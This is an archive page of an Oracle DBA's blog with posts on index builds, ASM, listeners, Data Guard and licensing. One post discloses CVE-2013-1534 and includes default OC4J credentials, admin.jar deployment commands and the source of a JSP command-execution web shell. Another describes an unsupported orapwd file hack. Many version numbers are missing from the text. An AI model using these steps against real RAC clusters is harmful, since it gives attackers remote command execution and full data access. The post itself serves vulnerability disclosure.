Archive for the ‘Oracle’ Category

ORA-14765: when CREATE INDEX ONLINE is not really online…

Friday, March 14th, 2014

Several days ago we’ve hit in our production application an the interesting new (to me at least) Oracle error “ORA-14765: Cannot create a partition while doing a create index”. It wouldn’t be strange if it wouldn’t happen during an CREATE INDEX ONLINE operation, so therefore it indicates that ONLINE index creation is not really an ONLINE operation (sic!).

Note1: you cannot test it in SYS schema, as the defered segment creation feature on partitioned table seems to be not working for SYS (or SYSTEM tablespace) as it is dedicated for Oracle dictionary purposes only. Seems to me that this is similiar story to the enhaced-checksums always enabled for SYSTEM tablespace (hidden paramter _db_always_check_system_ts which stands for “Always perform block check and checksum for System tablespace”) etc.

Note2: the key in order to get the error is to have parameter deferred_segment_creation set to TRUE, which is pretty recommended if you want to avoid space waste, starting with 11.2g, as it allocates at minimum 8MB initial extent per (sub)partition segment.

Note3: tested only on and

After a little playing here are the steps to reproduce it:

DBA1@test3> create table t1 (
    id number primary key,
    txt varchar2(64)
) partition by range (ts)  interval (NUMTOYMINTERVAL(1, 'MONTH'))
  partition p1 values less than (TO_DATE('01.01.2000', 'DD.MM.YYYY')),
  partition p2000_02 values less than (TO_DATE('01.02.2000', 'DD.MM.YYYY')),
  partition p2000_03 values less than (TO_DATE('01.03.2000', 'DD.MM.YYYY')),
  partition p2000_04 values less than (TO_DATE('01.04.2000', 'DD.MM.YYYY')),
  partition p2000_05 values less than (TO_DATE('01.05.2000', 'DD.MM.YYYY')),
  partition p2000_06 values less than (TO_DATE('01.06.2000', 'DD.MM.YYYY'))

Table created.

DBA1@test3> select table_name, segment_created from dba_tables where table_name='T1';

TABLE_NAME                     SEG
------------------------------ ---
T1                             N/A

DBA1@test3> select partition_name, segment_created from dba_tab_partitions where table_name='T1';

PARTITION_NAME                 SEGM
------------------------------ ----
P1                             NO
P2000_02                       NO
P2000_03                       NO
P2000_04                       NO
P2000_05                       NO
P2000_06                       NO

6 rows selected.


Now add a very large single current partition that will take some time :

DBA1@test3> insert  /*+ APPEND NOLOGGING */ into t1 (id, ts, txt) SELECT level, sysdate, 'blah' FROM dual CONNECT BY LEVEL <= 2500000;

2500000 rows created.

DBA1@test3> commit;

Commit complete.


Actually so far we have partition with segment_size approximatly of ~73MB in case of 8kB db blocks.

DBA1@test3> select p.partition_name, p.segment_created, s.bytes/1024 kb from dba_tab_partitions p left join dba_segments s on (p.partition_name=s.partition_name and p.table_name=s.segment_name) where p.table_name='T1' order by 2,1;

PARTITION_NAME                 SEGM         KB
------------------------------ ---- ----------
P1                             NO
P2000_02                       NO
P2000_03                       NO
P2000_04                       NO
P2000_05                       NO
P2000_06                       NO
SYS_P17066                     YES       73728

7 rows selected.

Now we start building online local index in our 1st session using “create index t1_i1 on t1 (ts, txt) local online”, immedietly followed by an attempt to insert single row into one of P2000_xx partition (which are without inititalized backing them segment at this point):

DBA1@test3> insert into t1 (id, ts, txt) values (3500000, TO_DATE('02.04.2000', 'DD.MM.YYYY'), 'testtesttest');
insert into t1 (id, ts, txt) values (3500000, TO_DATE('02.04.2000', 'DD.MM.YYYY'), 'testtesttest')
ERROR at line 1:
ORA-14765: Cannot create a partition while doing a create index


Summary: CREATE INDEX ONLINE is not fully compatibile with sessions performing DML transaction against (sub)partitions that doesn’t come with pre-allocated segments. There seems to be very likley possibility to run into ORA-14765 for Oracle transaction systems especially creating numerous automatically managed subpartitions based on some template (like Interval Range partitions that are subpartitioned by ID). Of course you may want to avoid defered segment creation (and sacrifise a lot of storage space) or live with the risks of hitting those errors during building indexes (hopefully application might just retry at later stage).

A new completley unsupported way of increasing ORAPWD entries

Friday, March 14th, 2014

FYI, i’ve just “invented” a completley new way of increasing capacity of orapwd files online that does not require knowing the SYS password (this is required once you hit ORA-1996, after trying to grant addiitonal SYSDBA). As you probably know there is hard limit of entries set when creating new orapw file and in addition it requires changing SYS password, apparently this seems to work (TM) but dont try this at home or any production system:

[oracle@t10050 dbs]$ cp orapwdtest4  orapwdtest4.old # make backup
[oracle@t10050 dbs]$ ls -l orapwdtes4 # save the filesize in bytes as SIZE1
[oracle@t10050 dbs]$ orapwd file=/tmp/remove entries=20
Enter password for SYS: anything
[oracle@t10050 dbs]$ ls -l /tmp/remove # file size will be approx 3584 bytes on Linux x86_64, if you compare it to the default orapwd , you will realize it is bigger by 2048 bytes
[oracle@t10050 dbs]$ dd if=/dev/zero of=/tmp/empty.2k bs=1k count=2
[oracle@t10050 dbs]$ cat /tmp/empty.2k >> orapwdtest4

Done! Brief tests shows that it works and you can add more working SYSDBA accounts, removal works ok, but again DO NOT TRY IT ON PRODUCTION as the internal orapwd structure is unknown to me ;)

CVE-2013-1534: remote command execution on Oracle RAC (Grid Infrastructure >= 11.2.0.[23].0 till PSU/CPU Apr2013)

Thursday, January 23rd, 2014

In April 2013 Oracle fixed CVE-2013-1534 an attack that I’m going to describe here as the guy who originally found it in February 2012 (it was an 0-day for more than a year). For official information please go here Critical Patch Update April 2013. One thing though i do not agree with Oracle that it scored it with score 7.5. This statement goes like this “For Linux, Unix and other platforms, the CVSS Base Score is 7.5, and the impacts for Confidentiality, Integrity and Availability are Partial+.” Basically this is remote attack that gains Oracle Grid Infrastructure owner privileges (basically “oracle”/”dba” in 99% cases) on clustered (RAC) Oracle databases, which gives you access in read/write mode to *all* data. Here I’m following responsible disclosure (vendor notified, fixed, clients alerted) … many, many months later I think all responsible people who care have already patched their Oracle RAC systems… for Patch Set this means it has been fixed via Grid Infrastructure + DB PSU (PatchSetUpdate) >= (current PSU is; for the recommended Oracle Alert docId is 1525152.1: Patch Set Update and Critical Patch Update April 2013 Availability Document).

Oracle starting in release of Grid Infrastructure 11gR2 (technically added something like Quality of Service (QoS) for Databases which in practice gives ability for DBAs to better utilize usage of resource between nodes in cluster in compatibility with business requirements. SLA are being managed by the newly introduced QoS functionality by placing workloads on “server pools”. QoS in was not full activated but starting in Grid Infrastructure it is online by default, even without confirmation, etc. It is also being activated by default on any upgrade.

The QoS on RAC/Grid Infrastructure is partially being implemented by embedded Oracle Containers for Java (OC4J).

qosadmin account (with always default pw of “oracle112″ per Oracle documentation on every install) has always an oc4j-administrators role assigned in /u01/app/11.2.0/grid/oc4j/j2ee/home/OC4J_DBWLM_config ($GRID_HOME/oc4j/j2ee/home/OC4J_DBWLM_config) in file system-jazn-data.xml (JAZN stands for Java AuthoriZatioN). The same security configuration file is also being used as place to control of whether username:password pair is authorized to deploy any J2EE application.

This means that OC4J is prone to arbitrary command execution on any Oracle clustered (RAC) database running at least on top of Oracle Clusterware (AKA Grid Infrastructure) >=, until CPU (PSU) April 2013 has been applied. This affects both customers using QoS and those not using it. The reason is because OC4J service (serving HTTP interface over port 8888) is always and by definition enabled. The attack would by definition use “qosadmin” account… The QoS for RAC documentation (which nobody does read because it is “new” feature and by definition nobody uses nothing in production like this) states that the password for “qosadmin” should be changed because it may be used for QoS-related functionality. The remaining functionality seems to be not enabled because it was not configured… but there’s more.

What’s more interesting is that there is second account named “oc4jadmin” (a typical default OC4J admin), after brute-forcing it also appears to be set to “oracle112″… on every installation out there… and you won’t find a single line in official documentation for RAC that this “backdoor” should be disabled. So in summary every RAC >= on this planet has the same passwords set for uploading J2EE applications remotely over RMI (Java thing). The oc4jadmin account is also assigned the oc4j-administrators role.

Some more details:
a) platform independent (100% success rate) exploitation vector
b) arbitrary command execution
c) gives UID of Oracle Grid Infrastructure software owner (typically “oracle” [1] or “grid” [2])
d) affects RAC >=, >=, has been tested on
[*] (linux x86_64),
[*] (linux x86_64),
[*] // CPU Jan2012
[*] // CPU Apr2012
[*] // CPU Jan2013
e) so by definition it will also work against flagship Oracle Exadata “Unbreakable” Database Machine ( as it utilizes Oracle RAC/Grid Infrastructure
f) this thing is remote
g) this thing does NOT require any sort of authentication (just plain TCP/IP connectivity to the servers is enough)
h) vulnerability is present in any installation of Oracle Grid Infrastructure >=
i) no social engineering is required at all
j) remote ports 23792 and 8888 needs to be reachable to at least single RAC node (the one running the RMI service)
k) it does NOT work against Oracle Restart (single server non-RAC Grid Infrastructure installation)

[1] – by being “oracle” UNIX/Linux user one can connect “/ AS SYSDBA” so it is full compromise of data (including modification). Additionally because it is compromise giving shell access it is very easy to also defeat Oracle Database Vault (additional option for segregation of DBAs from users – think in terms of MAC vs DAC [4]). If you are interested in defeating Oracle Databases with Vault option then I recommend you the following link :)

[2] – when a new feature “Role Separation” introduced in 11gR2 [separates ASM/Grid/Clusterware admins from DBAs] is deployed, which is very rare, it is still possible to get root, I’ll blog about it in future. That’s why probably Oracle scored it CVSS 7.5, but the main point is it is very rare to see separated Grid Infrastructure owner from Oracle RDBMS Home owner

….ooooOOOO Exploitation Demonstration OOOOoooo…..

OC4J provides a command-line utility, admin.jar and admin_client.jar. You can use any of them however I’ve only tested admin.jar (which of course is installed with any OC4J, RAC >= software too). Both JARs are actually just simple tools to upload single EAR file and reconfigure remote OC4J so that is starts serving requests for certain uploaded applications under specific URLs. We are going to upload cmd.ear :) The best documentation on them comes directly from Oracle e.g. here

The easiest way to get the admin.jar (however I’ve used the one coming with RAC) is to download it from Oracle OC4J download page as it contains “OC4J Admin Client” (link , 3 disks, total 1.4GB). Probably you need to use admin.jar/admin_client.jar as close to the version of OC4J being attacked (e.g. usage of 9.x.x admin.jar might fail uploading to RAC >= as the OC4J embedded there is at version 10.1.3, etc). I would recommend installing it on RHEL/OL compatible Linux distribution if possible (due to the enterprise nature of Oracle software). The other thing is that you could probably use some ready-to-run RAC VirtualMachine Linux template from Oracle (works for me under XEN). I’ve also tried the metasploit generic RMI uploaders (for JBoss if i remember correctly) but I’ve failed (perhaps it’s possible, but IMHO there are more easy ways).

Actually there are only 2 commands and 1 click to exploit this vulnerability. You do not need to write any tools/exploits, just execute several commands to upload cmd.ear onto vulnerable RAC installation due to the default passwords being deployed.

1. Deploy/upload file (exploit) to vulnerable RAC cluster

Detail: java -jar admin.jar ormi://<target>:23792 qosadmin oracle112  -deploy -file <path_cmd_exploit.ear> -deploymentName cmd


[root@attacker home]# /u01/app/11.2.0/grid/jdk/jre/bin/java -jar admin.jar ormi://labr2:23792 qosadmin oracle112  -deploy -file ~/cmd.ear -deploymentName cmd
Uploading file /root/cmd.ear to oc4j server side
[ 2012-06-08 08:14:39.290 EDT ] Application Deployer for cmd STARTS.
[ 2012-06-08 08:14:40.850 EDT ] Copy the archive to /u01/app/11.2.0/grid/oc4j/j2ee/home/applications/cmd.ear
[ 2012-06-08 08:14:40.879 EDT ] Initialize /u01/app/11.2.0/grid/oc4j/j2ee/home/applications/cmd.ear begins...
[ 2012-06-08 08:14:40.881 EDT ] Unpacking cmd.ear
[ 2012-06-08 08:14:40.887 EDT ] Done unpacking cmd.ear
[ 2012-06-08 08:14:40.895 EDT ] Unpacking cmd.war
[ 2012-06-08 08:14:40.905 EDT ] Done unpacking cmd.war
[ 2012-06-08 08:14:40.906 EDT ] Initialize /u01/app/11.2.0/grid/oc4j/j2ee/home/applications/cmd.ear ends...
[ 2012-06-08 08:14:40.907 EDT ] Starting application : cmd
[ 2012-06-08 08:14:40.907 EDT ] Initializing ClassLoader(s)
[ 2012-06-08 08:14:40.908 EDT ] Initializing EJB container
[ 2012-06-08 08:14:40.909 EDT ] Loading connector(s)
[ 2012-06-08 08:14:40.921 EDT ] Starting up resource adapters
[ 2012-06-08 08:14:40.921 EDT ] Initializing EJB sessions
[ 2012-06-08 08:14:40.922 EDT ] Committing ClassLoader(s)
[ 2012-06-08 08:14:40.922 EDT ] Initialize cmd begins...
[ 2012-06-08 08:14:40.927 EDT ] Initialize cmd ends...
[ 2012-06-08 08:14:40.929 EDT ] Started application : cmd
[ 2012-06-08 08:14:40.932 EDT ] Application Deployer for cmd COMPLETES. Operation time: 1642 msecs

[root@attacker home]#

2. Now we bind EAR(application/exploit) to the URL of OC4J server
Once the J2EE(EAR) application has been deployed you need to bind it to visible URL:

[root@attacker home]# /u01/app/11.2.0/grid/jdk/jre/bin/java -jar admin.jar ormi://labr2:23792 qosadmin oracle112 -bindWebApp cmd cmd default-web-site /cmd
[root@attacker home]#

Basically you can specify qosadmin or oc4jadmin, as I’ve stated earlier it doesn’t matter.

3. Profit!
OK, you need to open web-browser first and go to URL http://target:8888/cmd/cmd.jsp?cmd=id+-a , where target is one hostname of the RAC nodes

Or if you need kicking ass web GUI interface to own someone: http://RACtarget:8888/cmd/


p.s. the cmd.jsp (and EAR built from it – i’m not going to provide it) is very simple:

<%@ page import="java.util.*,*"%>
Commands with JSP
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                disr = dis.readLine();

ASM diskgroup with negative disk sizes

Tuesday, January 7th, 2014

Sometimes as DBA you will see strange signs on your way, like this one ASM +DATA diskgroup with no data, no files something taking space(notice the Total_MB != Free_MB):

ASMCMD> lsdg
State    Type    Rebal  Sector  Block       AU  Total_MB  Free_MB  Req_mir_free_MB  Usable_file_MB  Offline_disks  Voting_files  Name
MOUNTED  EXTERN  N         512   4096  1048576   4095940  3271458                0         3271458              0             N  DATA/
MOUNTED  EXTERN  N         512   4096  1048576    102398   102304                0          102304              0             N  REDO/
MOUNTED  EXTERN  N         512   4096  1048576      1019      623                0             623              0             Y  SYSTEMDG/
ASMCMD> find +DATA *
ASMCMD> lsdsk

Rebalance won’t help, ASM logs are clear and so you are more and more confused. The situtation is a little bit awkward but one can find a negative (!) capacity (close to -2^32 value) of some ASM disks that were recently added:

ASMCMD> lsdsk -k -G DATA
Total_MB      Free_MB   OS_MB  Name       Failgroup  Failgroup_Type  Library  Label  UDID  Product  Redund   Path
  409594       409037  409594  DATA_0000  DATA_0000  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_05
  409594       408885  409594  DATA_0001  DATA_0001  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_06
  409594       408895  409594  DATA_0002  DATA_0002  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_07
  409594       408680  409594  DATA_0003  DATA_0003  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_08
  409594       408987  409594  DATA_0004  DATA_0004  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_09
  409594       408931  409594  DATA_0005  DATA_0005  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_10
  409594       409079  409594  DATA_0006  DATA_0006  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_11
  409594       408964  409594  DATA_0007  DATA_0007  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_12
  409594  -4294555512  409594  DATA_0008  DATA_0008  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_13
  409594  -4294554748  409594  DATA_0009  DATA_0009  REGULAR         System                         UNKNOWN  /dev/oracleasm/disks/DATA_14

To fix the problem one can drop the affected ASM disks, remove ASMLib labels, and the critical thing is to reinitialize/overwrite with 0 (using dd from /dev/zero) large header on the individual LUN (at least 10MB) and afterwards re-add those disks (using ASMLib) to the diskgroup using normal ALTER DISKGROUP +DG ADD DISK syntax. Afterwards you will find normal utilization in the diskgroup:

SQL> select name, state, type, total_mb, free_mb from v$asm_diskgroup;

NAME                           STATE       TYPE     TOTAL_MB    FREE_MB
------------------------------ ----------- ------ ---------- ----------
DATA                           MOUNTED     EXTERN    4095940    4090620
REDO                           MOUNTED     EXTERN     102398     102304
SYSTEMDG                       MOUNTED     EXTERN       1019        623


Reason: probably LUN disks were not properly initialized (only 1MB has been overwritten), however no errors were found during 1st initialization. Another strange thing on so not critical development system :)

Oracle Certified Master 11g

Tuesday, December 3rd, 2013


It is official now: I have successfully passed Oracle Database 11g Administrator Certified Master Exam (at the age of 28 should I add). It took long time preparing for it (years since starting career as Oracle DBA), so there were almost no internal-like blog posts.

  • It’s of the most advanced exams in IT for Senior DBAs managing mission critical 24×7 environments (blood-life of any big IT system currently).
  • The best place for information on this exam is the OCM page itself, but you are going to fully realize it after the exam
  • Costs are insane (OCA, OCP as perquisites + 3 Oracle University trainings[$$$] + cost of the 2-day exam [$$])
  • Tempo on the practical exam is insane too, there is no time left for thinking, you literally are doing stuff faster than you can think about it for 2 full days.
  • Mistakes costs a lot of time, it is all about skills and speed. If you have skills, but won’t be to perform some Exam Topic under single skill-set time even do not bother thinking about the exam itself.
  • You are not allowed to loose your data and I think it is fair to say, if you loose the database (or database availability for too long) you are out of the exam. This is tested but as I’m under NDA I will not go into details.

The stress caused by the number of tasks to be performed plus stress of doing something wrong (fear that you will damage your main production DB) plus constant stress during the exam of something random (like hardware, deliberate actions) failing create truly unique atmosphere during those 2 days… It is like 4 years of growth for Oracle-based IT system compressed into 2 days with all the obstacles and challenges.

RATE_LIMIT and Oracle RAC 11gR2?

Monday, November 4th, 2013

Oracle SQLNet/TNS connections rate limiting is an awesome way of increasing stability of Oracle databases by allowing controlling insane behavior of starting up Applicaton Servers or Middleware components that push hundredths connections to the databases and thus killing CPU on the database/server side (and impacting other critical work). The way it works is also very important, it is not just refusing connections, but accept()-ing socket, but not starting processing (just queuing the work). For more detail you can look official Oracle whitepaper, especially

The way its working is important , because rejecting the TCP connections (via TCP FIN or TCP RST) would cause application to get “Unable to get connection” type errors, which is in most cases not something you want to achieve for various reasons. If that feature doesn’t work you won’t be able to re-implement it in different way – let’s say using Linux’s NetFilter – because you are able to rate limit TCP connections there primarily by dropping them.

You may be surprised after reading official Oracle documentation regarding rate limiting Oracle SQLNet/TNS connections is NOT supported on RAC installations. The official documentation itself is silent on this topic, but this has been confirmed via Oracle SR to support. The probable primary reason for this is that CRS in 11gR2 manages normal and SCAN listeners so you have no choice of altering Oracle managed listner.ora and endpoints_listener.ora files because they are overwritten by… but still documentation asks you to them. Clearly a conflcit here.

On RAC/CRS the listeners are supposed to be altered only via “srvctl” command. srvctl actually is just frontend because oraagent.bin daemon takes care since 11gR2 for monitoring and housekeeping listeners. The problem is that srvctl does NOT have a way to enable RATE_LIMIT, but also there is no option to alter more advanced parameters like QUEUESIZE (fortunately on Linux 2.6.x backlog depth for listen() seems to be SOMAXCONN=/proc/sys/net/core/somaxconn=128 by default), SDU, etc (those are actually being mentioned in Bug 11782958: “SRVCTL DOES NOT SUPPORT LISTENER CONFIGURATION LIKE MODIFYING QUEUESIZE, SEND/RE”, also in DocID 1292915.1 “Setting Parameters for Scan and Node Listeners on RAC, Queuesize, SDU, Ports, etc”)

Sample srvctl options for 11gR2:

[oracle@racnode1 ~]$ aso srvctl config listener -a
Network: 1, Owner: oracle
Home: <CRS home>
  /u01/app/11.2.0/grid11203 on node(s) racnode1, racnode2
End points: TCP:1521
[oracle@racnode1 ~]$ aso srvctl modify listener -h

Modifies the configuration for the listener.

Usage: srvctl modify listener [-l <lsnr_name>] [-o <oracle_home>] [-p "[TCP:]<port>[, ...][/IPC:<key>][/NMP:<pipe_name>][/TCPS:<s_port>] [/SDP:<port>]"] [-u <oracle_user>] [-k <net_num>]
    -l <lsnr_name>           Listener name (default name is LISTENER)
    -o <oracle_home>         ORACLE_HOME path
    -p "[TCP:]<port>[, ...][/IPC:<key>][/NMP:<pipe_name>][/TCPS:<s_port>] [/SDP:<port>]"       Comma separated tcp ports or listener endpoints
    -u <oracle_user>         Oracle user
    -k <net_num>             network number (default number is 1)
    -h                       Print usage
[oracle@racnode1 ~]$

Additionally in Doc Id 1568591.1 “11gR2 Listener With RATE_LIMIT Set: Slow Connect Time and Tnsping Response Time High with TNS-1158 Error” BUG:16409926 “LISTENER MEMORY LEAK IF RATE_LIMIT IS USED AND ENFORCED FREQUENTLY” is being mentioned (still not present in and PSUs, but fixed in and included from start in Overall this feature doesn’t seem to be widely used and/or tested and doesn’t make good feelings…

Oracle RAC SCAN is not compatibile with NAT (and thus with PCI DSS)

Tuesday, August 6th, 2013

Oracle Single Client Access Name (SCAN) – a single access point name for Oracle RAC instance VIPs – seems often to be problematic in environments that use NAT or have to be able with compliance regulations such as PCI DSS:

  1. section 1.3.3 – “Do not allow any direct connections inbound or outbound for traffic between the Internet and the cardholder data environment”
  2. section 1.3.8 – “Do not disclose private IP addresses and routing information to unauthorized parties. Note: Methods to obscure IP addressing may include, but are not limited to: Network Address Translation (NAT) [..]“

The problem with giving external/internal parties access to Oracle RAC database clusters basically could be defined as “Oracle SCAN incompatibility with Destination NAT/TCP proxies that are network brokers”, here’s simple successful connection example to TNS_ENTRY1 alias (served via single 1xSCAN raccluster-scan VIP and racnode1/racnode2 Oracle VIPs)

[someone@racnode1 ~]$ sqlplus doesnotexists@TNS_ENTRY1
[someone@racnode1 ~]$ grep -e nnftrne: -e niotns: -e nsc2addr: sqlnet_1696.trc
(1002018528) [06-AUG-2013 09:58:30:471] nnftrne: entry
(1002018528) [06-AUG-2013 09:58:30:471] nnftrne: Original name: TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:472] nnftrne: Using tnsnames.ora address (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = raccluster-scan)(PORT = 1521)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = TNS_ENTRY1))) for name TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:472] nnftrne: exit
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: entry
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: Original name: TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: Using tnsnames.ora address (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = raccluster-scan)(PORT = 1521)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = TNS_ENTRY1))) for name TNS_ENTRY1
(1002018528) [06-AUG-2013 09:58:30:512] nnftrne: exit
(1002018528) [06-AUG-2013 09:58:30:527] niotns: entry
(1002018528) [06-AUG-2013 09:58:30:527] niotns: niotns: setting up interrupt handler...
(1002018528) [06-AUG-2013 09:58:30:527] niotns: Not trying to enable dead connection detection.
(1002018528) [06-AUG-2013 09:58:30:528] niotns: Calling address: (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=raccluster-scan)(PORT=1521))(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=TNS_ENTRY1)(CID=(PROGRAM=sqlplus)(HOST=racnode1)(USER=someone))))
(1002018528) [06-AUG-2013 09:58:30:529] nsc2addr: (DESCRIPTION=(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=TNS_ENTRY1)(CID=(PROGRAM=sqlplus)(HOST=racnode1)(USER=someone)))(ADDRESS=(PROTOCOL=TCP)(HOST=10.xx.yy.43)(PORT=1521)))
(1002018528) [06-AUG-2013 09:58:30:537] nsc2addr: (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=10.xx.yy.42)(PORT=1521)))
(1002018528) [06-AUG-2013 09:58:30:572] niotns: niotns: passing ns handle back up...
(1002018528) [06-AUG-2013 09:58:30:572] niotns: exit
[someone@racnode1 ~]$

As you can see from the above example the following is happening:
a) client is connecting via TCP/1521 to raccluster-scan
b) SCAN listener on raccluster-scan redirects – via TCP data – to hostname of the least loaded Oracle VIP (!)
c) client spawns a new connection directly to the Oracle VIP on TCP/1521 (!!)

The main problem is that when you have DNAT defined with single TCP port redirection that looks like this some Oracle client –TCP port 33333 –> DNAT/proxy_redirection –> Oracle SCAN VIP, this is not going to work because Oracle SCAN listener will redirect “some Oracle client” to Oracle VIP TCP/1521. This will fail in 1 out of 3 ways:

  1. failure scenario1: client might fail to resolve hostname using it’s own DNS
  2. failure scenario2: client might succeed DNS hostname resolution of OracleVIPX resolution but is going to be unable to reach the private VIP address via IP routing because routers/default gateway won’t know how to route to the destination (e..g client is coming from different organization, internet, etc)
  3. failure scenario3: client might succeed DNS hostname resolution, might even be able to route to the the OracleVIPX IP is, but there is firewall somewhere in between (e.g. on the same box that is doing DNAT/TCP proxy) blocking “some client” to reach directly OracleVIPX on TCP/1521

There are several solutions to this problem:
1) don’t use Oracle SCAN simple name but provide long TNS conneciton string with a number of NAT-ted/proxied TCP ports defined (every Oracle RAC node VIP should have its own NATTed/proxied TCP port for failover purposes – Oracle client is responsible for load balancing and failovering Oracle connections)
- or -
2) implement some kind of highly available TCP proxy that intelligently routes Oracle traffic to healthy RAC instances (e.g. HAproxy if you really have clients that support only short Oracle hostnames)
- or -
3) do tricks on external-facing DNS name servers (or locally on clients by placing entries on /etc/hosts) by spoofing internal host names as proxy one, but you will need 1:1 ratio of external to internal IPs to meet this goal (remember each Oracle VIP serves connections on port 1521!)
- or -
4) THE SIMPLEST ONE: do not use NAT and allow direct traffic on firewall, as NAT is evil :)


gv$dataguard_stats is buggy even on most recent PSUs

Tuesday, August 6th, 2013

Oracle introduced a new RAC-enabled view for DataGuard named gv$dataguard_stats probably starting with 11.2. However this view returns false information when queried on RAC standby node where MRP0 is not running, sample:

1st instance of standby RAC with MRP0 running:

SQL> select name,value from v$dataguard_stats;

NAME                           VALUE
------------------------------ --------------------
transport lag                  +00 00:00:00
apply lag                      +00 00:00:00
apply finish time              +00 00:00:00.000
estimated startup time         18

SQL> select name,value from gv$dataguard_stats;

NAME                           VALUE
------------------------------ --------------------
transport lag                  +00 00:00:00
apply lag                      +00 00:00:00
apply finish time              +00 00:00:00.000
estimated startup time         18
transport lag                  +00 00:00:00
apply lag                      +00 00:21:56
apply finish time              +00 00:00:41.526
estimated startup time         29

8 rows selected.


According to this gv$dataguard_stats output there lag is 0s on 1st node (itself) and 21mins (time since when MRP0 has been relocated from 2nd node to 1st one) – this is wrong, because when you ask 2nd RAC instance for its local view of DataGuard apply lag you will see 0s.

SQL> select name,value from v$dataguard_stats;

NAME                             VALUE
-------------------------------- ------------------------------
transport lag                    +00 00:00:00
apply lag                        +00 00:00:00
apply finish time                +00 00:00:00.000
estimated startup time           29


This inconsistency has been reported to Oracle in SR 3-6005743051: inconsistent gv$dataguard_stats on RAC standby. They did not register bug (even for docs) but returned with the following clarification:

the rows “apply lag time”, “apply finish time” and “estimated startup time” are relevant only for the applying instance. You are allowed to send log files to several instances – in such a case “transport lag” is relevant for all receiving instances.

This has certain repercussions as if you want to monitor standby lag properly – you will need to locate first the MRP0 process and then query this instance via dedicated connection for v$dataguard_stats. Doing shortcuts by using gv$dataguard_stats might return false results. Another question is why such (buggy in my opinion) view has been introduced at all if it represents no value.


Oracle Database 12.1c released. Licensing gotchas

Wednesday, June 26th, 2013

Accroding to Oracle® Database Licensing Information 12c Release 1 (12.1) there are some gotchas but also features which seemed pretty reasonable to be included in “basic” Enterprise Edition. The most interesting list for me is as follows:

  • Multitenant (CDB/PDB stuff) is additional paid option.
  • ILM/Heat Maps/Automatic Data Optimization belong to Advanced Compression Option
  • DataGuard Far Sync (semi bunker-site like SRDF/A* in EMC Symmetrix/VMAX solution) is licensed as follows: Far sync instances are part of the Oracle Active Data Guard Far Sync feature, which requires an Oracle Active Data Guard license. (..) A far sync instance consumes very little disk and processing resources, yet provides the ability to failover to a terminal destination with zero data loss, as well as offload the primary database of other types of overhead (for example, redo transport). You would guess they charge additionally for the number of cores on the lightweight (in terms of storage capacity and CPU) proxy instance, WRONG! Here is is stated that The far sync instance can be installed and used on a server different from the server where the Oracle Database is installed and used. It is not necessary to obtain a separate license for the server running the far sync instance.
  • Oracle Flex ASM and Oracle Flex Cluster – this is a mystery to me
  • Oracle Clusterware may be used to protect any application (restarting or failing over the application in the event of a failure) on any server, free of charge. Oracle will provide support for Clusterware only if the server is running an Oracle product, which may include Oracle Linux or Oracle Solaris, that is also under Oracle support.
  • There is also interesting statement: As of the release of Oracle Database 12c, network encryption (native network encryption and SSL/TLS) and strong authentication services (Kerberos, PKI, and RADIUS) are no longer part of Oracle Advanced Security and are available in all licensed editions of the Oracle database.- Finally! No excuses of not encrypting your sensitive connections! Wait… yeah, it means more CPU usage especially on the (Oracle) CPU-licensed side ;)

Part 2: Oracle SecureFile LOB is better than BasicFile, isn’t it?

Tuesday, June 18th, 2013

So we start an example from real life of using SecureFiles (without deduplication and without encryption) on large scale system (say no-no to a “laptop database” tests) version Oracle non-RAC (yup, a pretty old release but the DB has been already migrated since gathering this info):

primary:sys@XXXX> desc YYYYYYYY.magic_table;
 Name                                                  Null?    Type
 HEADERS                                                        BLOB
 PAYLOAD                                                        BLOB

primary:sys@XXXX> select num_rows, blocks, AVG_ROW_LEN from dba_tables  where table_name='MAGIC_TABLE';

---------- ---------- -----------
   3791737     891649         204

The table is on 8kB tablespace, so our MAGIC_TABLE with 2 LOB columns is taking ~ 891649*8192/1024/1024/1024 =~ 6.8GB. We verify our math to real usage as shown by dba_segments:

primary:sys@XXXX> select bytes/1024/1024/1024 mb from dba_segments where segment_name='MAGIC_TABLE';


The value is pretty close to the standard Oracle theory, so we are ok so far. We proceed with analysis what uses space in that table (we are going to concentrate on single LOB for PAYLOAD column for simplicity):


X             COUNT(*)
----------- ----------
Inline         3100800
Out-of-line     732826


FACT1: so 24% of rows have PAYLOAD LOB stored out-of-line, out-of-line probably means different place, let’s check it.

primary:sys@XXXX> SELECT table_name, column_name, segment_name, round(a.bytes/1024/1024,1) mb FROM dba_segments a
JOIN dba_lobs b USING (owner, segment_name) WHERE b.table_name LIKE 'MAGIC_TABLE%';

TABLE_NAME                     COLUMN_NAME          SEGMENT_NAME                           MB
------------------------------ -------------------- ------------------------------ ----------
MAGIC_TABLE                    HEADERS              SYS_LOB0000099004C00007$$              ,1
MAGIC_TABLE                    PAYLOAD              SYS_LOB0000099004C00008$$         1769095


